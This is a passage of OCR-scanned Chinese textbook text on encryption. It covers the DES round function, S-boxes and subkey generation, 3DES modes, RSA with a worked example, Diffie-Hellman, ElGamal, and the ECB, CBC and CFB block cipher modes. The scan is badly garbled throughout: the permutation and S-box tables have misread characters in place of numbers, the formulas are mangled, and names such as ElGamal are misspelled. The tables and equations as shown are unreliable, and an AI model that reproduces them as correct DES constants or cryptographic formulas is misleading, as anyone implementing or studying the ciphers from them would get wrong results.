列 , 然 后 从 33 开始 排 在 第 一 列 的 左边 ,从 41 开始 排 在 第 二 列 的 左边 ,交叉 进行 。 

2. 乘积 变换 中 的 f 变换 

乘积 变换 的 核心 是 f 变换 , 它 是 非 线 性 的 ,是 每 轮 实 现 混乱 的 最 关键 的 模块 ,输入 32 
位 ,经 过 扩展 置换 变 成 48 位 ,与 子 密 钥 进行 异 或 运算 ,选择 S 盒 蔡 换 , 将 48 位 压缩 还 原 成 
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64 位 明文 
1 
初始 置换 IP 
L032 人 i) RuG2 们 ) 
一 后 
由 -一 由 一 -下 
Li=Ro Ri=Lo@ flRo,K1) 
T 
1 1 
Lis=Ri4 [Ris=Ls® /Ri Ks) 
T Kis 
OT— Oe 
1 f 
Rie-Lis Ris Ko) Peras | 
逆 初 始 置换 IP” 
1 
64 位 密 文 
图 3-11 DES 算法 的 乘积 变换 

40 8 48 16 | 56 24 64 | 32 
39 7 47 本 | 5 23 63 | 31 
38 6 46 14 | 54 22 62 | 30 
37 3 45 i3. | 豆 21 61 | 29 
36 4 44 12 | 52 20 60 | 28 
35 3 43 条 | 5 19 59 | 27 
34 42 10 | 50 18 58 | 26 
33 1 41 9 49 17 57 25 


图 3-12 逆 初 始 变换 IP' 


32 位 ,再 进行 P 盒 替 换 , 输 出 32 位 。 如 图 3-13 所 示 ,虚线 部 分 为 了 变换 。 详 细 的 变化 过 程 
如 图 3-14 所 示 。 

(1) 扩展 置换 。 扩 展 置换 将 32 位 扩展 为 48 位 , 按 图 3-15 所 示 的 排列 方式 进行 重新 
排列 。 

(2) S 盒 蔡 换 。 将 48 位 按 6 位 分 为 1 组 , 共 8 组 ,也 称 为 8 个 S 盒 , 记 为 SS:…Ss。 每 
个 S 盒 产生 4 位 输出 。8 个 S 盒 的 替换 表 如 表 3-8 所 示 。 

每 个 S 盒 都 由 4 行 X16 列 组 成 ,每 行 是 0 一 15 的 一 个 全 排列 ,每 个 数字 用 对 应 的 4 位 
二 进 制 比特 串 表 示 。 例 如 ,9 用 1001 表示 .7 用 0111 表示 。 设 6 位 输入 为 aaaaasaiasas ,将 
aias 组 成 一 个 2 位 二 进 制 数 ,对 应 S 盒 表 中 的 行 号 ; 将 azasasas 组 成 一 个 4 位 二 进 制 数 ,对 
应 S 盒 表 中 的 列 号 。 这 样 ,映射 到 交叉 点 的 数据 就 是 该 S 盒 的 输出 。 
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La(32 位 ) Ri1(32 位 ) 


扩展 置换 (48 位 ) 


中 密 钥 变 换 
| 子 密 钥 K(48 位 ) 


1 
1 
5S 合 替换 (48 们 ) | 
1 
1 
1 


了 盒 蔡 换 (32 位 ) 
| = 
L(32 位 ) R(32 位 ) | 


图 3-13 ”一 轮 和 迭代 过 程 


32 位 


48 位 
一 一 一 K(48 位 ) 
48 位 
6 位 6 位 6 位 6 位 站 6 位 6 位 6 位 6 位 


4 位 4 位 4 位 4 位 二 4 位 
P 例 替换 


32 位 
图 3-14 /变换 的 计算 过 程 


32 1 各 外 :和 二 | 次 
4 5 6 | 7 8 | 9 
8 9 10 | 1 12 | 13 
12 13 14 | 15 16 | 17 
16 17 18 | 19 20 | 21 
20 21 | 区 24 | 25 
24 25 26 | 27 28 29 
28 29 30 | 21 32 1 
图 3-15 扩展 置换 


例如 ,已 知 第 2 个 S 盒 的 输入 为 111101, 则 wm 王 1,as 一 1,aias 一 (11): 一 3, 表 明 对 应 的 
行 号 为 3, (azrasasas) 一 (1110): 一 14, 表 明 对 应 列 号 为 14。 查 第 2 个 S 盒 蔡 换 表 ,S, 中 行 号 
为 3、 列 号 为 14 的 数据 为 14, 转 化 成 二 进 制 得 到 的 输出 为 1110。 
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表 3-8 S 盒 替换 表 
列 在 
0 下 2 可 4 5 6 及 8 9 10 Wl 12 13 14 15 
0 14 4 13 Yl 2 15 18 8 多 10 6 12 5 9 0 7 
和 15 4 4 14 2 13 1 10 6 12 型 9 5 3 8 
2 1 14 8 13 6 2 和 15 有 7 va 10 5 0 3 
3 5 12 2 4 9 wn 5 I 14 14 10 0 6 13 
0 5 和 14 6 11 和 4 9 做 2 13 过 0 5 10 
i 3 3 4 15 2 8 14 也 0 1 10 6 9 11 & s, 
2 0 14 党 和 10 4 19 1 5 8 12 6 9 条 2 15 
3 13 8 10 到 3 15 4 用 11 6 12 0 5 14 9 
0 10 9 14 6 1 15 6 1 13 12 型 4 多 8 
于 13 0 9 3 4 6 10 2 8 5 14 12 证 15 上 s, 
2 13 4 9 8 和 3 0 i 烛 2 12 有 10 14 Vy 
有 也 10 13 0 6 9 8 将 4 15 14 3 也 5 2 12 
0 有 要 14 3 0 6 9 10 1 多 8 5 2 412 4 15 
EL 13 1 5 6 bh 0 癌 4 va 2 12 10 14 9 s, 
2 10 9 0 12 11 虹 13 15 3 14 5 和 8 4 
过 $ 15 0 6 10 . I 8 9 4 5 | 12 闻 2 14 
0 二 4 7 10 11 6 8 各 3 5 3 0 14 9 
1 14 也 2 12 4 尝 13 和 5 0 翅 10 3 9 8 6 s, 
2 4 必 二 11 10 13 [和 8 15 9 2 5 6 3 0 14 
3 E 8 多 A 1 14 13 6 扎 0 10 4 5 3 
0 Ee a 10 15 9 2 8 0 9 3 14 7 5 11 
t 19 18 4 2 党 12 5 6 1 招 14 0 人 和 8 S， 
2 14 了 5 过 2 8 12 各 演 0 4 10 pi 18 11 6 
3 4 3 2 12 9 5 15 10 11 14 1 7 6 0 8 13 
0 4 dl 2 14 15 0 8 13 3 12 9 池 5 10 6 1 
EL 13 0 11 7 4 9 10 14 3 5 12 2 15 8 6 
2 1 4 11 13 12 a 号 14 10 15 6 8 0 5 9 4 Sr 
3 6 地 13 8 和 4 10 人 9 5 0 15 14 2 3 12 
0 13 吕 8 4 6 15 ly 1 10 9 3 14 5 12 
全 显 5 13 8 10 a 2 4 12 5 6 11 0 14 9 2 s, 
2 7 11 4 9 13 14 0 6 10 13 15 0 5 8 
3 多 14 人 4 10 8 13 15 12 9 0 3 5 6 11 
(3) P 盒 痊 换 。P 盒 答 换 就 是 将 S 盒 蕉 换 后 的 32 位 盖 1 一 一 一 本 一 
作为 输入 , 按 图 3-16 所 示 的 顺序 重新 排列 ,得 到 的 32 位 | 29 | -127 | 38 17 
结果 即 为 f 函数 的 输出 (Ri_1.K;)。 1 15 23 26 
上 18 31 10 
3. 子 密 钥 的 生成 一 
初始 密 钥 长 度 为 64 位 ,但 每 个 第 8 位 是 奇偶 校 验 位 ，| 32 | 27 | 3 | 9 
分 布 在 第 8.16、24、32、40、48、56 和 64 位 的 位 置 上 ,目的 | 19 | 5B 30 6 
是 用 来 检 错 ,实际 的 初始 密 铀 长 度 为 56 位 . 在 DES 算 法 | "| 4 | 3 
中 ,每 一 轮 迭 代 需 要 使 用 一 个 子 密 钥 . 子 密 钥 是 从 用 户 输 图 3-16 了 盒 蔡 换 
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入 的 初始 密 钥 中 产生 的 。 图 3-17 所 示 为 各 轮子 密 钥 的 产生 流程 。 


64 位 密 钥 K 
i 
置换 选择 1(PC-1) 
CiC8 们 ) 二 
1 第 ! 轮 
Zs, 2 
t T 
C1(28 位 ) DiQ8fY) 
5 位 置换 选择 2(PC-2) 上 -一 Ki(48 位 ) 
让 
了 Si6 Lsie 
第 16 
1 T 
Ce 的 Die28 们 ) 


-| 置换 选择 2PC-2) [一 一 Kie(48 位 ) 
56 位 


图 3-17 子 密 钥 的 产生 流程 


子 密 钥 的 生成 过 程 包括 置换 选择 1(PC-1) ,循环 左 移 、 置 换 选 择 2(PC-2) 等 变换 ,分 别 
产生 16 个 子 密 钥 。 

(1) 置换 选择 1(PC-1)。 对 于 64 位 初始 密 钥 K , 按 表 3-9 所 示 的 置换 选择 表 PC-1 进 
行 重新 排列 。 不 难 算出 ,丢掉 了 其 中 8 的 整数 倍 位 置 上 的 比特 位 ,置换 选择 1 后 的 变换 结果 
是 56 位 。 将 前 28 位 记 为 Cu ,后 28 位 记 为 Du 。 


表 3-9 “置换 选择 1(PC-1)” 的 置换 表 


57 49 41 33 25 的 8 
. 58 50 42 34 26 18 
10 2 59 51 43 35 27 
1 也 3 60 52 44 36 
63 55 47 39 31 23 15 
7 62 54 46 38 30 22 
14 6 61 53 45 37 29 
21 13 5 28 20 12 4 


(2) 循环 左 移 。 在 不 同 轮 次 ,循环 左 移 LS; (1 二 i 过 16) 的 位 数 不 同 ,如 表 3-10 所 示 。 第 
1 轮 循环 左 移 LS 二 1, 第 2 轮 循环 左 移 LS; 二 1, 第 3 轮 循环 左 移 LS; 二 2, 依 次 类 推 。 
表 3-10 循环 左 移 的 位 数 


廊 柜 次 数 # | | 器 | 针 | 和 | 上 这 | 于 || 政 | 如 | 六 | 四 | 名 


循环 左 移 LS; a L 2 2 2 2 2 2 1 2 2 2 2 2 2 h 
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(3) 置换 选择 2(PC-2)。 与 置换 选择 1 相同 ,对 输入 的 32 位 比特 串 按 表 3-11 所 示 的 置 
换 选 择 表 PC-2 进行 重新 排列 ,输出 即 为 子 密 钥 。 


表 3-11 “置换 选择 2(PC-2)” 的 置换 表 


14 17 11 24 1 a 
3 28 折 6 21 10 
23 19 12 4 26 8 
16 7 27 20 护 2 
41 52 3 37 47 55 
30 40 51 45 33 48 
44 49 39 56 34 53 
46 42 50 36 29 32 
4. DES 解密 过 程 


DES 解密 过 程 的 逻辑 结构 与 加 密 过 程 一 致 ,但 必须 注意 以 下 两 点 。 

(1) 第 16 轮 迭 代 结束 后 须 将 左右 两 个 分 组 交换 位 置 , 即 将 Li 与 Ri 交换 顺序 。 

(2) 解密 过 程 中 使 用 的 子 密 钥 的 顺序 与 加 密 时 的 顺序 正好 相反 ,依次 为 Ki , Kis ,…， 
Ki, 即 当 把 64 位 密 文 作为 明文 输入 时 ,解密 过 程 的 第 1 轮 迭 代 使 用 子 密 钥 Ki ,第 2 轮 迭 代 
使 用 子 密 钥 Kis ,… ,第 16 轮 迭 代 使 用 子 密 钥 Ki , 同 理 ,第 16 轮 迭 代 后 须 交换 顺序 ,最 终 输 
出 得 到 64 位 明文 。 

5. DES 算法 的 安全 隐患 

DES 算法 具有 以 下 3 种 安全 隐患 。 

(1) 密 钥 太 短 。DES 的 初始 密 钥 实际 长 度 只 有 56 位 ,批评 者 担心 这 个 密 钥 长 度 不 足 
以 抵抗 穷 举 搜索 攻击 , 穷 举 搜索 攻击 破解 密 钥 最 多 尝试 的 次 数 为 2* 次 ,不 太 可 能 提供 足 
够 的 安全 性 。1998 年 前 只 有 DES 破译 机 的 理论 设计 ,1998 年 后 出 现实 用 化 的 DES 破 
译 机 。 

(2) DES 的 半 公 开 性 。DES 算法 中 的 8 个 S 盒 替换 表 的 设计 标准 ( 指 详细 准则 ) 自 
DES 公布 以 来 仍 未 公开 ,替换 表 中 的 数据 是 否 存在 某 种 依存 关系 ,用 户 无 法 确认 。 

(3) DES 迭代 次 数 偏 少 。DES 算法 的 16 轮 和 迭代 次 数 被 认为 偏 少 , 在 以 后 的 DES 改进 
算法 中 ,都 不 同 程度 地 进行 了 提高 。 

6. 三 重 DES 应 用 

针对 DES 密 钥 位 数 和 迭代 次 数 偏 少 等 问题 ,有 人 提出 了 多 重 DES 来 克服 这 些 缺 陷 , 比 
较 典 型 的 是 2DES、3DES 和 4DES 等 几 种 形式 ,实用 中 一 般 广泛 采用 3DES 方案 , 即 三 重 
DES。 它 有 以 下 4 种 使 用 模式 。 

(1) DES-EEE3 模式 : 使 用 3 个 不 同 密 钥 (Ki ,K; ,Ks ) ,采用 3 次 加 密 算法 。 

(2) DES-EDE3 模式 : 使 用 3 个 不 同 密 钥 (K, ,Ks ,Ks), 采 用 加 密 一 解密 一 加 密 算法 。 

(3) DES-EEE2 模式 : 使 用 两 个 不 同 密 钥 (K 一 K;,K,), 采 用 3 次 加 密 算法 。 

(4) DES-EDE2 模式 : 使 用 两 个 不 同窗 钥 (Ki 一 K;.K;), 采 用 加 密 一 解密 一 加 密 算 法 。 

3DES 的 优点 : 密 钥 长 度 增加 到 112 位 或 168 位 , 抗 穷 举 攻击 的 能 力 大 大 增强 ; DES 基 
本 算法 仍然 可 以 继续 使 用 。 
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3DES 的 缺点 : 处 理 速度 相对 较 慢 ,因为 3DES 中 共 需 迭代 48 次 ,同时 密 钥 长 度 也 增加 
了 ,计算 时 间 明 显 增 大 ; 3DES 算法 的 明文 分 组 大 小 不 变 , 仍 为 64 位 ,加 密 的 效率 不 高 。 


3.5 非 对 称 密码 体制 


1976 年 ,Diffie 与 Hellman 在 IEEE 期 刊 上 提出 了 划时代 的 公开 密 钥 密 码 系统 的 概念 ， 
这 个 观念 为 密码 学 的 研究 开辟 了 一 个 新 的 方向 ,有 效 地 解决 了 秘密 密 钥 密码 系统 通信 双方 
密 钥 共享 困难 的 缺点 ,并 引进 了 创新 的 数字 签名 的 观念 。 非 对 称 密码 系统 (asymmetric 
encryption) 可 为 加 解密 或 数字 签名 系统 。 由 于 加 密 或 签名 验证 密 钥 是 公开 的 , 故 称 为 公 钥 
(public key) ,而 解密 或 签名 产生 密 钥 是 秘密 的 , 故 称 为 私 钥 (private key)。 因 为 公 钥 与 私 
钥 不 同 , 且 公 钥 与 私 钥 必须 存在 成 对 (key pair) 与 唯一 对 应 的 数学 关系 ,使 得 由 公 钥 去 推导 
私 钥 在 计算 上 不 可 行 ,因此 非 对 称 密码 系统 又 称 为 公开 密 钥 系统 或 双 钥 系统 ,其 模型 如 
图 3-18 所 示 。 公 钥 密 码 体制 的 公 钥 密码 算法 是 基于 数学 问题 求解 的 困难 性 而 提出 的 算法 ， 
它 不 再 是 基于 替代 和 置换 的 方法 。 


公 


Alice 私 钥 Alice 公 钥 
asdnfal 


入 sdjflas 
djflaks 
Alice Bob 


图 3-18 非 对 称 密码 模型 


公 钥 密码 体制 的 产生 主要 基于 两 个 原因 : 一 是 为 了 解决 常规 密 钥 密码 体制 的 密 钥 管理 
与 分 配 的 问题 ; 二 是 为 了 满足 对 数字 签名 的 需求 。 因 此 , 公 钥 密码 体制 在 消息 的 保密 性 、 密 
钥 分 配 和 认证 领域 有 着 重要 的 意义 。 

在 公 钥 密码 体制 中 , 公 钥 是 可 以 公开 的 信息 ,而 私 钥 是 需要 保密 的 。 加 密 算法 EE 和解 
密 算法 D 也 都 是 公开 的 。 用 公 钥 对 明文 加 密 后 , 仅 能 用 与 之 对 应 的 私 钥 解 密 , 才 能 恢复 出 
明文 ,反之 亦 然 。 

公 钥 密码 体制 的 优 缺 点 如 下 。 

优点 : 网 络 中 的 每 一 个 用 户 只 需要 保存 自己 的 私 钥 .N 个 用 户 仅 需 产 生 N 对 密 钥 。 密 
钥 少 ,便于 管理 ; 密 钥 分 配 简单 ,不 需要 秘密 的 通道 和 复杂 的 协议 来 传送 密 钥 。 公 钥 可 基于 
公开 的 渠道 (如 密 钥 分 发 中 心 ) 分 发 给 其 他 用 户 , 而 私 钥 则 由 用 户 自己 保管 ; 可 以 实现 数字 
签名 。 

缺点 : 与 对 称 密 码 体制 相 比 , 公 钥 密码 体制 的 加 密 、 解 密 处 理 速度 较 慢 ,同等 安全 强度 
下 公 钥 密码 体制 的 密 钥 位 数 要 求 多 一 些 。 

公 钥 密码 体制 比较 流行 的 主要 有 两 类 : 一 类 是 基于 因子 分 解难 题 的 ,其 中 最 典型 的 是 
RSA 密码 算法 ; 另 一 类 是 基于 离散 对 数 难 题 的 ,如 EIGamal 公 钥 密码 体制 和 椭圆 曲线 公 钥 
密码 体制 。 
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3.5.1 RSA 密码 算法 


RSA 密码 算法 是 美国 麻 省 理工 学 院 的 Rivest、Shamir 和 Adleman 3 位 学 者 于 1978 年 
提出 的 。RSA 密码 算法 方案 是 唯一 被 广泛 接受 并 实现 的 通用 公开 密码 算法 ,目前 已 经 成 为 
公 钥 密码 的 国际 标准 。 它 是 第 一 个 既 能 用 于 数据 如 密 , 也 能 用 于 数字 签名 的 公开 密 钥 密码 
算法 。 在 Internet 中 ,电子 邮件 收发 的 加 密 和 数字 签名 软件 PGP 就 采用 了 RSA 密码 

1. 算法 描述 

RSA 密码 算法 描述 如 下 。 

(1) 密 钥 对 的 产生 。 

Q@ 选取 两 个 大 素数 p 和 g。 

加 计算 n=p"g 及 n 的 欧 拉 函数 值 pg(n)==(p 一 1)(g 一 1)。 

@ 然后 随机 选取 整数 e(1 二 e 二 p(n)), 且 满足 GCD(e,g(n))= 二 1(GCD 表示 求 最 大 公约 
数 运算 ), 即 pg(n) 和 e 互 素 。 

@ 由 扩展 的 欧 几 里 得 算法 求 出 d, 使 得 e。* d= 二 1 mod gp(n)。 

@ 形成 密 钥 对 ,其 中 公 钥 为 {e,n) , 私 钥 为 {d,n}。p,g 是 秘密 参数 ,需要 保密 ,如 不 需 
要 保存 ,可 销毁 。 

(2) 加 密 过 程 。 加 密 时 要 使 用 接收 方 的 公 钥 ,不 妨 设 接收 方 的 公 钥 为 e, 明 文 m 满足 
0 三 m 二 n( 否 则 需要 进行 分 组 ) ,计算 c= 二 m* (mod n) ,ce 为 密 文 。 

(3) 解密 过 程 。 计 算 m==c? (mod n)。 

【 例 3-10】 选取 p=11,g= 二 13, 则 

n=p*.g=1lxX13= 143 
gn) = (p—1)(g—1)= (1—1)(13—1)= 120 

然后 ,选择 e 王 17 ,满足 GCD(e,p(n))= 二 GCD(17,120)==1, 计 算 d=e!'(mod 120)。 因 
为 1=120 一 7X17, 所 以 d= 一 7 二 113(mod 120), 则 公 钥 为 (e,n) 二 (17,143), 私 钥 为 
d=113。 

假设 对 明文 信息 m= 二 24 进行 加 密 , 则 密 文 为 

c=m 一 247 一 7(mod 143) 
密 文 c 经 公开 信道 发 送 到 接收 方 后 ,接收 方 用 私 钥 d 对 密 文 进行 解密 : 
m= = 一 24C56d 143) 

从 而 正确 地 恢复 出 明文 。 

2. 安全 性 分 析 

(1) RSA 的 安全 性 依赖 于 著名 的 大 整数 因子 分 解 的 困难 性 问题 。 如 果 要 求 n 很 大 , 则 
攻击 者 将 其 成 功 地 分 解 为 pg 是 困难 的 。 反 之 , 若 n 二 p* g; 则 RSA 便 被 攻破 。 因 为 一 旦 
求 得 的 两 个 素 因 子 p 和 g ,那么 立即 可 得 的 欧 拉 函数 值 为 p(n) 二 (p 一 1)(g 一 1), 青 利用 
欧 几 里 得 扩展 算法 求 出 RSA 的 私 钥 d==e (mod p(n))。 

虽然 大 整数 的 因子 分 解 是 十 分 困难 的 .但 是 随 着 科学 技术 的 发 展 ,人 们 对 大 整数 因子 分 
解 的 能 力 在 不 断 提高 ,而 且 分 解 所 需 的 成 本 在 不 断 下 降 。1994 年 ,一 个 通过 Internet 上 
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1600 余 台 计算 机 进行 合作 的 小 组 仅仅 在 工作 了 8 个 月 后 就 成 功 分 解 了 129 位 的 十 进 制 数 ， 
1996 年 4 月 又 破译 了 RSA-130,1999 年 2 月 又 成 功 地 分 解 了 140 位 的 十 进 制 数 。1999 年 8 
月 ,阿姆斯特丹 的 国家 数学 与 计算 机 科学 研究 所 一 个 国际 密码 研究 小 组 通过 一 台 Cray900- 
16 超级 计算 机 和 300 台 个 人 计算 机 进行 分 布 式 处 理 ,运用 二 次 筛选 法 花费 7 个 多 月 的 时 间 
成 功 地 分 解 了 155 位 的 十 进 制 数 (相当 于 512 位 的 二 进 制 数 )。 这 些 工作 结果 使 人 们 认识 
到 ,要 安全 地 使 用 RSA ,应 当 采 用 足够 大 的 整数 ,建议 选择 p 和 g 大 约 是 100 位 的 十 进 制 
素数 ,此 时 模 长 n 大 约 是 200 位 十 进 制 数 ( 实 际 要 求 n 的 长 度 至 少 是 512 比特 ),e 和 4d 选择 
100 位 左右 , 密 钥 {e,n}) 或 {d,n} 的 长 度 大约 是 300 位 十 进 制 数 ,相当 于 1024 位 二 进 制 数 ( 因 
为 lb 10” 二 308X1lb 10 守 1024)。 不 同 应 用 可 视 具 体 情 况 而 定 , 如 安全 电子 交易 (Secure 
Electronic Transaction,SET) 协 议 中 要 求 认证 中 心 采 用 2048 比特 的 密 钥 ,其 他 实体 则 采用 
1024 比特 的 密 钥 。 

(2) RSA 的 加 密 函 数 是 一 个 单 向 函数 ,在 已 知 明文 m 和 公 钥 {e,n) 的 情况 下 ,计算 密 文 
是 很 容易 的 ; 但 反 过 来 ,在 已 知 密 文 和 公 钥 的 情况 下 ,恢复 明文 是 不 可 行 的 。 从 分 析 (1) 中 
得 知 ,在 很 大 的 情况 下 ,不 可 能 从 {e,n} 中 求 得 d, 也 不 可 能 在 已 知 c 和 {e,n}) 的 情况 下 求 得 
d 或 m。 


3.5.2 Diffie-Hellman 密 钥 交换 算法 


Diffie 和 Hellman 在 1976 年 发 表 的 论文 中 提出 了 公 钥 密码 思想 ,但 没有 给 出 具体 的 方 
案 , 原 因 在 于 没有 找到 单 向 函数 ,但 在 该 文中 给 出 了 通信 双方 通过 信息 交换 协商 密 钥 的 算 
法 , 即 Diffie-Hellman 密 钥 交换 算法 ,这 是 第 一 个 密 钥 协商 算法 ,只 能 用 于 密 钥 分 配 ,而 不 能 
用 于 加 密 或 解密 信息 。 

1. 算法 描述 

Diffie-Hellman 的 安全 性 是 基于 Z, 上 的 离散 对 数 问题 。 设 p 是 一 个 满足 要 求 的 大 素 
数 , 并 且 g(0 二 g 二 p) 是 循环 群 Z， 的 生成 元 ,g 和 pp 公开 ,所 有 用 户 都 可 以 得 到 g 和 p。 在 
两 个 用 户 A 与 B 通 信和 时 ,它们 可 以 通过 如 下 步骤 协商 通信 所 使 用 的 密 钥 。 

(1) 用 户 A 选取 一 个 大 的 随机 数 a(2 三 a 三 p 一 2) ,计算 S4= 二 g*(mod p), 并 且 把 SA 发 
送 给 用 户 B。 

(2) 用 户 B 选 取 一 个 大 随机 数 8B(2 三 Bp 一 2) ,计算 Ss 二 gf(mod p), 并 且 把 Ss 发 送 给 
用 户 As 

(3) 用 户 A 收 到 Ss 后 ,计算 As 一 S38(Cmod p); 用 户 B 收 到 Ss 后 ,计算 kaa 二 SA (mod p)。 

由 于 有 As 一 S3(mod p)= (gs(mod p))°(mod p)=g* (mod p)= SA (mod p)=kaa , 令 
上 二 kap 二 kaa ,这 样 用户 A 和 B 就 拥有 了 一 个 共享 密 钥 , 就 能 以 作为 会 话 密 钥 进行 保密 
通信 了 。 

2. 安全 性 分 析 

当 模 p 较 小 时 ,很 容易 求 出 离散 对 数 。 依 目前 的 计算 能 力 , 当 模 p 达到 至 少 150 位 十 
进 制 数 时 , 求 离散 对 数 成 为 一 个 数学 难题 。 因 此 ,Diffie-Hellman 密 钥 交 换算 法 要 求 模 p 至 
少 达 到 150 位 十 进 制 数 , 其 安全 性 才能 得 到 保证 。 但 是 ,该 算法 容易 遭受 中 间 人 攻击 。 造 成 
中 间 人 攻击 的 原因 在 于 通信 双方 交换 信息 时 不 认证 对 方 , 攻 击 者 很 容易 冒充 其 中 一 方 获得 
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成 功 。 
3.5.3 ”EIGamal 加 密 算法 


EIGamal 公 钥 密码 体制 是 由 EIGamal 在 1985 年 提出 的 ,是 一 种 基于 离散 对 数 问题 的 
公 钥 密码 体制 。 该 密码 体制 既 可 用 于 加 密 , 又 可 用 于 数字 签名 ,是 除 RSA 密码 算法 之 外 最 
有 代表 性 的 公 钥 密码 体制 之 一 。 由 于 EIGamal 体制 有 较 好 的 安全 性 ,因此 得 到 了 广泛 的 应 
用 。 著 名 的 美国 数字 签名 标准 DSS 就 是 采用 了 EIGamal 签名 方案 的 一 种 变形 。 其 算法 描 
述 如 下 。 

(1) 密 钥 生成 。 首 先 随机 选择 一 个 大 素数 p, 且 要 求 p 一 1 有 大 素数 因子 。g € Z; (2Z， 
是 一 个 有 zp 个 元 素 的 有 限 域 ,Zi 是 由 QZ 中 的 非 零 元 构成 的 乘法 群 ) 是 一 个 生成 元 。 然 后 
再 选 一 个 随机 数 xz(1x 志 p 一 1) ,计算 y= 二 g”(mod p), 则 公 钥 为 (y,g,p), 私 钥 为 xz。 

(2) 加 密 过 程 。 不 妨 设 信 息 接收 方 的 公私 钥 对 为 {x,y) ,对 于 待 加 密 的 消息 mE€ 2 ,发 送 
方 选 择 一 个 随机 数 RE Zi ,然后 计算 a 二 g*(mod p) ,cz 二 my (mod p), 则 密 文 为 (ci ,cs )。 

(3) 解密 过 程 。 接 收 方 收 到 密 文 (c ,cz ) 后 ,由 私 钥 工 计算 cs(cf)-:Cmod p), 因 

calct) (mod p) = nny‘(mod p)) ((g:(mod 轧 ))7) =m(y(g) (mod 思 ) 一 7 
故 消息 m 被 恢复 。 

实际 上 ,EIGamal 加 密 算法 最 大 的 特点 在 于 它 的 “ 非 确 定性 ”"。 由 于 密 文 依赖 于 执行 加 
密 过 程 的 发 送 方 所 选取 的 随机 数 &, 因 此 加 密 相 同 的 明文 可 能 会 产生 不 同 的 密 文 。EIGamal 
还 具有 消息 扩展 因子 , 即 对 于 每 个 明文 ,其 密 文 由 两 个 Z, 上 的 元 素 组 成 。EIGamal 通过 乘 
以 y* 来 掩盖 明文 mm, 同样 g* 也 作为 密 文 的 一 部 分 进行 传送 。 因 为 正确 的 接收 方 知道 解密 
密 钥 xz, 他 可 以 从 g* 中 计算 得 到 (8g) 一 (8 六 一 兴 , 从 而 能 够 从 c 中 “去 除 掩盖 ”而 得 到 明 
文 m。 


3.6 密码 学 的 应 用 


密码 学 的 作用 不 仅仅 在 于 对 明文 的 加 密 和 对 密 文 的 解密 ,更 重要 的 是 它 可 以 很 好 地 解 
决 网 络 通信 中 广泛 存在 的 许多 安全 问题 ,如 身份 鉴别 .数字 签名 、 秘 密 共 享 和 抗 否认 等 。 本 
节 介 绍 密码 应 用 模式 、 加 密 方式 。 


3.6.1 密码 应 用 模式 


DES IDEA 及 AES 等 分 组 加 密 算法 的 基本 设计 是 针对 一 个 分 组 的 加 密 和 解密 的 操 
作 。 然 而 ,在 实际 的 使 用 中 被 加 密 的 数据 不 可 能 只 有 一 个 分 组 ,需要 分 成 多 个 分 组 进行 操 
作 。 根 据 加 密 分 组 间 的 关联 方式 .分 组 密码 主要 分 为 以 下 4 种 模式 。 

1. 电子 密码 本 模式 

电子 密码 本 (Electronic Code Book,ECB) 是 最 基本 的 一 种 加 密 模 式 , 分 组 长 度 为 64 
位 。 每 次 加 密 均 独立 , 且 产 生 独 立 的 密 文 分 组 ,每 一 组 的 加 密 结 果 都 不 会 影响 其 他 分 组 ,如 
图 3-19 所 示 。 
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明文 分 组 
1 1 1 
密 钥 -| E =| | 史 吉 | 歼 
1 1 

密 文 分 组 
f 1 1 1 
密 钥 一 =| D -|D =| =| 
[ 1 1 1 

明文 分 组 


图 3-19 电子 密码 本 模式 


电子 密码 本 模式 的 优点 : 可 以 利用 平行 处 理 来 加 速 加 密 、 解 密 运 算 , 且 在 网 络 传输 时 ， 
即使 任 一 分 组 发 生 错误 ,也 不 会 影响 到 其 他 分 组 。 

电子 密码 本 模式 的 缺点 : 对 于 多 次 出 现 的 相同 的 明文 , 当 该 部 分 明文 恰好 是 加 密 分 组 
的 大 小 时 ,可 能 发 生 相 同 的 密 文 ,如 果 密 文 内 容 遭 到 剪贴 替换 等 攻击 ,也 不 容易 被 发 现 。 

在 ECB 模式 中 ,加 密 函 数 忆 与 解密 函数 卫 满足 以 下 关系 : 

DrK(CEK(C7z)) 一 77 

2. 密 文 链接 模式 

密 文 链接 (Cipher Block Chaining,CBC) 模 式 的 执行 方式 如 图 3-20 所 示 。 第 一 个 明文 
分 组 先 与 初始 向 量 (Initialization Vector,IV) 做 异 或 (XOR) 运 算 ,再 进行 加 密 。 其 他 每 个 明 
文 分 组 加 密 之 前 ,必须 与 前 一 个 密 文 分 组 做 一 次 异 或 运算 ,再 进行 加 密 。 


明文 分 组 | | | | 
1 1 1 1 
初始 向 量 一 人) 一 ~ ~ 中 一 ~ 
1 ] 1 1 
窗 钥 一 | E | 已 -IE 全 | 加 
| | 
密 文 分 组 
密 钥 一 ”| D ~=|D 一 到 | 态 一 = 了 
1 1 1 1 
初始 向 量 一 — G) 一 下 ~ 中 -~ 
+ 1 + 1 
明文 分 组 | 


图 3-20 ” 密 文 链接 模式 


密 文 链接 模式 的 优点 : 每 一 个 分 组 的 加 密 结 果 均 会 受 其 前 面 所 有 分 组 内 容 的 影响 ,所 
以 即使 在 明文 中 多 次 出 现 相同 的 明文 ,也 不 会 产生 相同 的 密 文 ; 另外 , 密 文 内 容 若 遭 剪贴 、 
替换 ,或 者 在 网 络 传输 的 过 程 中 发 生 错 误 , 则 其 后 续 的 密 文 将 被 破坏 ,无 法 顺利 解密 还 原 , 因 
此 ,这 一 模式 很 难 伪造 成 功 。 

密 文 链接 模式 的 缺点 : 如 果 加 密 过 程 中 出 现 错误 , 则 这 种 错误 会 被 无 限 放大 ,从 而 导致 


第 3 章 信息 加 密 技 术 63 


加 密 失 败 ; 这 种 加 密 模式 很 容易 受到 攻击 , 遭 到 破坏 。 
在 CBC 模式 中 ,加 密 函 数 己 与 解密 函数 了 满足 以 下 关系 : 
Dx (Er(m))=m 
3. 密 文 反馈 模式 
密 文 反馈 (Cipher Feed Back,CFB) 模 式 如 图 3-21 所 示 。CFB 需要 一 个 初始 向 量 IV， 
加 密 后 与 第 一 个 分 组 进行 异 或 运算 产生 第 一 组 密 文 ; 然后 ,对 第 一 组 密 文 加 密 再 与 第 二 个 
分 组 进行 异 或 运算 取得 第 二 组 密 文 , 依 次 类 推 ,直至 加 密 完毕 。 


明文 分 | 
密 角 1 | 1 | 
AAAN AN AN 
初始 向量 了 i e "7 a $7 ? 
密 文 分 旨 | 
初始 向 量 1 | 1 | 
\ NN WT 
> E OO 中 和 9 
明文 分 组 


图 3-21 密 文 反馈 模式 


密 文 反馈 模式 的 优点 : 每 一 个 分 组 的 加 密 结果 受 其 前 面 所 有 分 组 内 容 的 影响 ,即使 出 
